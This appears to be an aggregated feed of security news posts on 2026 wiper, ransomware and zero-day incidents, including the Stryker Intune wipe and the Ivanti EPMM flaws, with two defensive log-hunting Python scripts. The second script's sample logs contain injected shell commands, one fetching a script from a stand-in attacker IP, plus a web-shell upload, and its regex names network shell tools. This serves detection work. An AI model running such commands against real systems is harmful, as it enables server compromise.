This Week In Security: State Malware, State Hardware Bans, And Stuxnet Before Stuxnet Was Cool

Making headlines everywhere is the CopyFail Linux kernel vulnerability, which allows local privilege escalation (LPE) from any user to root privileges on most kernels and distributions. Local privi…

Hackaday
VECT Ransomware: Why Paying Won’t Get Your Files Back - Check Point Blog

Do not pay the ransom. VECT permanently destroys large files rather than locking them. Even the attackers cannot recover them. Payment will not restore them.

VECT ransomware irreversibly destroys large files due to a critical flaw. Check Point Research confirms paying the ransom will not restore data on Windows, Linux, or ESXi.

Check Point Blog

📰 VECT 2.0 Ransomware Flaw Means Paying the Ransom is Pointless—Large Files are Wiped Forever

⚠️ VECT 2.0 ransomware is actually a destructive WIPER for files >128KB! A critical flaw makes data recovery impossible, even if you pay. Researchers warn that paying the ransom is pointless as the decryption keys are destroyed. #Ransomware #Wiper #CyberSecurity

🔗 https://cyber.netsecops.io

Venezuela energy sector targeted by highly destructive Lotus wiper

Lotus Wiper hit Venezuelan energy systems, used scripts to disable defenses, then erased all data beyond recovery.

Security Affairs

‘CanisterWorm’ Springs #Wiper Attack #Targeting #Iran

A financially motivated data theft and #extortion group is attempting to inject itself into the #Iranwar, unleashing a #worm that spreads through poorly secured cloud services and wipes data on infected systems that use Iran’s time zone or have #Farsi set as the default language.
#security #CanisterWorm

https://krebsonsecurity.com/2026/03/canisterworm-springs-wiper-attack-targeting-iran/

‘CanisterWorm’ Springs Wiper Attack Targeting Iran – Krebs on Security

Let's talk about the Iran-US cyber front: Handala versus Stryker

It's been a while since I managed to find the time to update this blog and, given the events that have shaped and are still shaping security in recent weeks, I'm reopening with a post on Iran. On 11 March 2026 Stryker, one of the world's giants of medical technology, discovered what it means to have its entire Microsoft environment turned into a remote kill switch, operated by a pro-Iranian hacktivist group that signs itself Handala Hack and which intelligence […]

https://insicurezzadigitale.com/parliamo-del-fonte-cyber-iran-usa-handala-contro-stryker/

The Stryker outage confirms a shift in Handala’s tactics: moving from regional hacktivism to destructive global operations. By abusing Microsoft Intune, they bypassed traditional EDR to wipe 200k devices. Identity, not malware, was the vector.

Read More: https://www.security.land/stryker-cyberattack-handala-wiper/

#SecurityLand #News #Stryker #Handala #Wiper #MicrosoftIntune #Cybersecurity

Stryker Cyberattack: 200,000 Devices Wiped by Handala Group

On March 11, Stryker employees in 79 countries watched their laptops and phones factory-reset in real-time. This wasn't a ransom demand—it was a message.

Security Land | Decoding the Cyber Threat Landscape

Iran-linked hackers claim wiper attack on Stryker—200K systems wiped across 79 countries. No ransom, just destruction. Medical tech firm targeted over Israeli acquisition. Infrastructure warfare, not cybercrime. 🏥💥

https://krebsonsecurity.com/2026/03/iran-backed-hackers-claim-wiper-attack-on-medtech-firm-stryker/

#cybersecurity #wiper #iran

Iran-Backed Hackers Claim Wiper Attack on Medtech Firm Stryker – Krebs on Security

Breaking, new, by me: Iran-backed Hackers Claim Wiper Attack on Medtech Firm Stryker

A hacktivist group with links to Iran's intelligence agencies is claiming responsibility for a data-wiping attack against Stryker, a global medical technology company based in Michigan. News reports out of Ireland, Stryker's largest hub outside of the United States, said the company sent home more than 5,000 workers there today. Meanwhile, a voicemail message at Stryker's main U.S. headquarters says the company is currently experiencing a building emergency.

From the story:

"Wiper attacks usually involve malicious software designed to overwrite any existing data on infected devices. But a trusted source with knowledge of the attack who spoke on condition of anonymity told KrebsOnSecurity the perpetrators in this case appear to have used a Microsoft service called Microsoft Intune to issue a ‘remote wipe’ command against all connected devices."

"Intune is a cloud-based solution built for IT teams to enforce security and data compliance policies, and it provides a single, web-based administrative console to monitor and control devices regardless of location. The Intune connection is supported by this Reddit discussion on the Stryker outage, where several users who claimed to be Stryker employees said they were told to uninstall Intune urgently."

https://krebsonsecurity.com/2026/03/iran-backed-hackers-claim-wiper-attack-on-medtech-firm-stryker/

#stryker #handala #intune #wiper #cybersecurity
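The remote-wipe vector described in the quoted passage leaves a trail in the tenant's own audit log, so the detection a defender wants is a burst of wipe actions from a single account. The block below is an added example, not code from KrebsOnSecurity, Stryker or Microsoft: it runs a sliding-window burst detector over records in the shape of Microsoft Graph deviceManagement/auditEvents objects. The field names (actor.userPrincipalName, actor.ipAddress, activity, activityOperationType, activityDateTime, resources) are the Graph resource's; the activity strings, account names, IP addresses, device names and timestamps in the sample are constructed, and the wipe/retire match should be checked against activity names exported from your own tenant before relying on it.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Constructed sample records shaped like Graph deviceManagement/auditEvents objects.
# Accounts, IPs, device names and the exact activity strings are invented for illustration.
SAMPLE_EVENTS = [
    {"activityDateTime": "2026-03-11T07:58:02Z", "activity": "Update DeviceConfiguration",
     "activityOperationType": "Patch",
     "actor": {"userPrincipalName": "alice.admin@example.com", "ipAddress": "198.51.100.10"},
     "resources": [{"displayName": "Baseline-BitLocker"}]},
    {"activityDateTime": "2026-03-11T08:00:00Z", "activity": "Wipe ManagedDevice",
     "activityOperationType": "Action",
     "actor": {"userPrincipalName": "svc-mdm@example.com", "ipAddress": "203.0.113.7"},
     "resources": [{"displayName": "LAPTOP-0001"}]},
    {"activityDateTime": "2026-03-11T08:00:04Z", "activity": "Wipe ManagedDevice",
     "activityOperationType": "Action",
     "actor": {"userPrincipalName": "svc-mdm@example.com", "ipAddress": "203.0.113.7"},
     "resources": [{"displayName": "LAPTOP-0002"}]},
    {"activityDateTime": "2026-03-11T08:00:09Z", "activity": "Wipe ManagedDevice",
     "activityOperationType": "Action",
     "actor": {"userPrincipalName": "svc-mdm@example.com", "ipAddress": "203.0.113.7"},
     "resources": [{"displayName": "PHONE-0042"}]},
    {"activityDateTime": "2026-03-11T08:00:15Z", "activity": "Wipe ManagedDevice",
     "activityOperationType": "Action",
     "actor": {"userPrincipalName": "svc-mdm@example.com", "ipAddress": "203.0.113.7"},
     "resources": [{"displayName": "LAPTOP-0003"}]},
    # A lone helpdesk wipe 90 minutes later: normal operations, must not alert at threshold 3.
    {"activityDateTime": "2026-03-11T09:30:00Z", "activity": "Wipe ManagedDevice",
     "activityOperationType": "Action",
     "actor": {"userPrincipalName": "bob.helpdesk@example.com", "ipAddress": "198.51.100.22"},
     "resources": [{"displayName": "LAPTOP-0777"}]},
]

# Assumption: destructive device actions carry "wipe" or "retire" in the activity name.
WIPE_RE = re.compile(r"\b(wipe|retire)\b", re.IGNORECASE)


def parse_time(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def is_wipe(event):
    """True for an audit event that records a device wipe/retire action."""
    return (event.get("activityOperationType") == "Action"
            and bool(WIPE_RE.search(event.get("activity", ""))))


def wipe_bursts(events, window=timedelta(minutes=10), threshold=3):
    """One finding per actor that issued >= threshold wipe actions inside `window`.

    Each actor's wipe events are time-sorted and scanned with a sliding window;
    the finding reports the densest window seen, its source IPs and the devices hit.
    """
    by_actor = defaultdict(list)
    for ev in events:
        if is_wipe(ev):
            by_actor[ev["actor"]["userPrincipalName"]].append(ev)
    findings = []
    for actor, evs in by_actor.items():
        evs.sort(key=lambda e: parse_time(e["activityDateTime"]))
        times = [parse_time(e["activityDateTime"]) for e in evs]
        best, start = None, 0
        for end in range(len(evs)):
            while times[end] - times[start] > window:   # shrink window from the left
                start += 1
            count = end - start + 1
            if count >= threshold and (best is None or count > best["count"]):
                span = evs[start:end + 1]
                best = {"actor": actor, "count": count,
                        "first": span[0]["activityDateTime"],
                        "last": span[-1]["activityDateTime"],
                        "source_ips": sorted({e["actor"].get("ipAddress", "?") for e in span}),
                        "devices": [r["displayName"] for e in span for r in e.get("resources", [])]}
        if best:
            findings.append(best)
    return findings


if __name__ == "__main__":
    for f in wipe_bursts(SAMPLE_EVENTS):
        print(f"ALERT {f['actor']} issued {f['count']} wipes {f['first']}..{f['last']} "
              f"from {f['source_ips']}: {f['devices']}")
```

Tune `threshold` and `window` to the tenant's normal decommissioning rate; the useful follow-up on an alert is the actor's sign-in and MFA-registration history for the preceding hours, since an account and a session, not malware, are what the wipe rides on.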

It's been a busy 24 hours in the cyber world with significant updates on actively exploited zero-days, nation-state attacks on critical infrastructure, sophisticated vishing campaigns, and the evolving threat landscape of AI. Let's dive in:

Ivanti EPMM Zero-Days Under Active Exploitation ⚠️

- Ivanti has patched two critical zero-day vulnerabilities (CVE-2026-1281, CVE-2026-1340) in its Endpoint Manager Mobile (EPMM) product, both rated CVSS 9.8 for unauthenticated remote code execution (RCE).
- These flaws are actively being exploited in a limited number of customer environments, allowing threat actors to gain administrative access, move laterally, and potentially access sensitive data like phone numbers and GPS locations.
- While specific IOCs are scarce, defenders should scrutinise Apache access logs for unusual GET requests with bash commands in In-House Application Distribution and Android File Transfer Configuration features, and look for unexpected web shells or WAR/JAR files. If compromised, a full restore from backup or migration to a new EPMM instance is recommended.

🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/01/30/ivanti_epmm_zero_days/

Coordinated Cyber Attacks on Polish Critical Infrastructure 🚨

- CERT Polska has detailed coordinated destructive cyber attacks on over 30 wind and solar farms, a manufacturing company, and a combined heat and power (CHP) plant in Poland on December 29, 2025.
- The attacks, attributed to Russia's FSB-linked Static Tundra (aka Berserk Bear, Ghost Blizzard), involved reconnaissance, firmware damage, file deletion, and deployment of custom wiper malware like DynoWiper and LazyWiper.
- Initial access was gained via vulnerable Fortinet perimeter devices and statically defined accounts lacking two-factor authentication, with attackers also exfiltrating data related to OT network modernisation and SCADA systems from M365 services.

📰 The Hacker News | https://thehackernews.com/2026/01/poland-attributes-december-cyber.html

ShinyHunters-Style Vishing Bypasses MFA for SaaS Data Theft 🔒

- Mandiant has observed an expansion of financially motivated ShinyHunters-style (UNC6240) activity, tracked as UNC6661 and UNC6671, using advanced vishing and fake credential harvesting sites.
- These groups impersonate IT staff to trick employees into providing SSO credentials and MFA codes, then register their own devices for MFA to access cloud SaaS platforms, exfiltrate sensitive data, and extort victims.
- Organisations should enhance help desk verification processes, enforce strong passwords, remove SMS/phone/email as MFA options, restrict management access, and implement robust logging and detection for MFA lifecycle changes and SaaS export behaviours, moving towards phishing-resistant MFA like FIDO2.

📰 The Hacker News | https://thehackernews.com/2026/01/mandiant-finds-shinyhunters-using.html

Iran-Linked RedKitten Uses AI for Human Rights NGO Targeting 🐱

- A Farsi-speaking threat actor, RedKitten, linked to Iranian state interests, is targeting human rights NGOs and activists, likely leveraging large language models (LLMs) for tooling development.
- The campaign uses macro-laced Excel documents (fabricated protestor death details) in 7-Zip archives as lures, dropping a C#-based SloppyMIO implant via AppDomainManager injection.
- SloppyMIO uses GitHub as a dead drop resolver for Google Drive URLs, steganographically retrieving configuration for its Telegram Bot API-based command-and-control, enabling command execution, file exfiltration, and persistence.

📰 The Hacker News | https://thehackernews.com/2026/01/iran-linked-redkitten-cyber-campaign.html

Agentic AI: The Next Big Attack Surface 🤖

- A Dark Reading poll indicates that agentic AI is widely expected to become the top attack vector by the end of 2026, due to the expanded attack surface from agents' high access and autonomy, especially with insecure code and "shadow AI."
- Experts highlight that the primary vulnerability lies in what compromised AI agents can access, stressing that authentication and access control, rather than AI safety features, are the critical battleground for securing autonomous systems.
- Deepfakes are also rising as a major social engineering vector for high-value targets, while the adoption of phishing-resistant passkeys is lagging, leaving organisations vulnerable as agentic systems proliferate.

🕶️ Dark Reading | https://www.darkreading.com/threat-intelligence/2026-agentic-ai-attack-surface-poster-child

#CyberSecurity #ThreatIntelligence #Vulnerabilities #ZeroDay #RCE #Ivanti #NationState #APT #CriticalInfrastructure #Poland #Russia #Wiper #ShinyHunters #Vishing #MFA #SaaS #Extortion #Iran #RedKitten #LLM #AI #Deepfakes #ThreatLandscape #InfoSec #CyberAttack #Malware #IncidentResponse
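The Ivanti item above tells defenders to look through Apache access logs for GET requests carrying bash commands and for stray WAR/JAR files. The block below is an added example, not code from The Register, Ivanti or the post's author: it parses Apache combined-format lines, URL-decodes the request target repeatedly so double-encoded payloads surface, and flags GET targets containing shell syntax or requests delivering a WAR/JAR. The log lines, IP addresses and the `/mdm/...` paths are constructed placeholders, not EPMM's real routes; the detection is generic to any Apache front end.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format lines. IPs and paths are invented; the /mdm/... paths
# stand in for the application's real endpoints and are not Ivanti's routes.
SAMPLE_LOG = """\
198.51.100.5 - - [30/Jan/2026:10:01:07 +0000] "GET /mdm/device/register HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [30/Jan/2026:10:02:13 +0000] "GET /mdm/inhouse/download?file=a.apk;bash%20-c%20%22id%22 HTTP/1.1" 200 78 "-" "python-requests/2.31"
203.0.113.9 - - [30/Jan/2026:10:02:40 +0000] "GET /mdm/android/filetransfer/config?cmd=%2524(wget%2520http://203.0.113.9/x.sh) HTTP/1.1" 500 0 "-" "python-requests/2.31"
203.0.113.9 - - [30/Jan/2026:10:03:02 +0000] "PUT /mdm/uploads/shell.war HTTP/1.1" 201 0 "-" "python-requests/2.31"
198.51.100.6 - - [30/Jan/2026:10:05:55 +0000] "GET /mdm/user/login.jsp HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# client ident user [time] "METHOD target PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')

# Shell constructs that have no business in a URL: command substitution, chaining,
# interpreter/downloader invocations, bash network redirection.
SHELL_RE = re.compile(
    r"(\$\(|`|\|\||&&|/bin/(ba)?sh\b|\b(bash|sh|curl|wget|nc|python\d?)\s+[-\w/.]"
    r"|/dev/tcp/|;\s*(id|whoami|cat|echo|ls)\b)")
ARCHIVE_RE = re.compile(r"\.(war|jar)(\?|$)", re.IGNORECASE)


def decode_fully(s, max_rounds=3):
    """URL-decode repeatedly so double-encoded payloads (%2524 -> %24 -> $) are caught."""
    for _ in range(max_rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def inspect_line(line):
    """Return a finding dict for a suspicious line, or None for a clean/unparseable one."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = decode_fully(m.group("target"))
    reasons = []
    if m.group("method") == "GET" and SHELL_RE.search(target):
        reasons.append("shell syntax in GET target")
    if ARCHIVE_RE.search(target):
        reasons.append("WAR/JAR in request path")
    if not reasons:
        return None
    return {"ip": m.group("ip"), "time": m.group("time"), "method": m.group("method"),
            "target": target, "status": m.group("status"), "reasons": reasons}


def hunt(lines):
    return [f for f in (inspect_line(l) for l in lines) if f]


def by_source(findings):
    """Count findings per client IP: one address behind every hit is the pivot to chase."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = hunt(SAMPLE_LOG.splitlines())
    for h in hits:
        print(f"{h['time']} {h['ip']} {h['method']} {h['target']} -> {h['status']} ({', '.join(h['reasons'])})")
    print("per-source:", by_source(hits))
```

A 500 on a request that carries a decoded `$(...)` is as interesting as a 200: a failed attempt still names the attacker's address and the endpoint being probed. Feed the whole retention window through `hunt`, then pivot from `by_source` to every other request those addresses made.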

January blues return as Ivanti coughs up exploited EPMM zero-days: Consider yourselves compromised, experts warn

The Register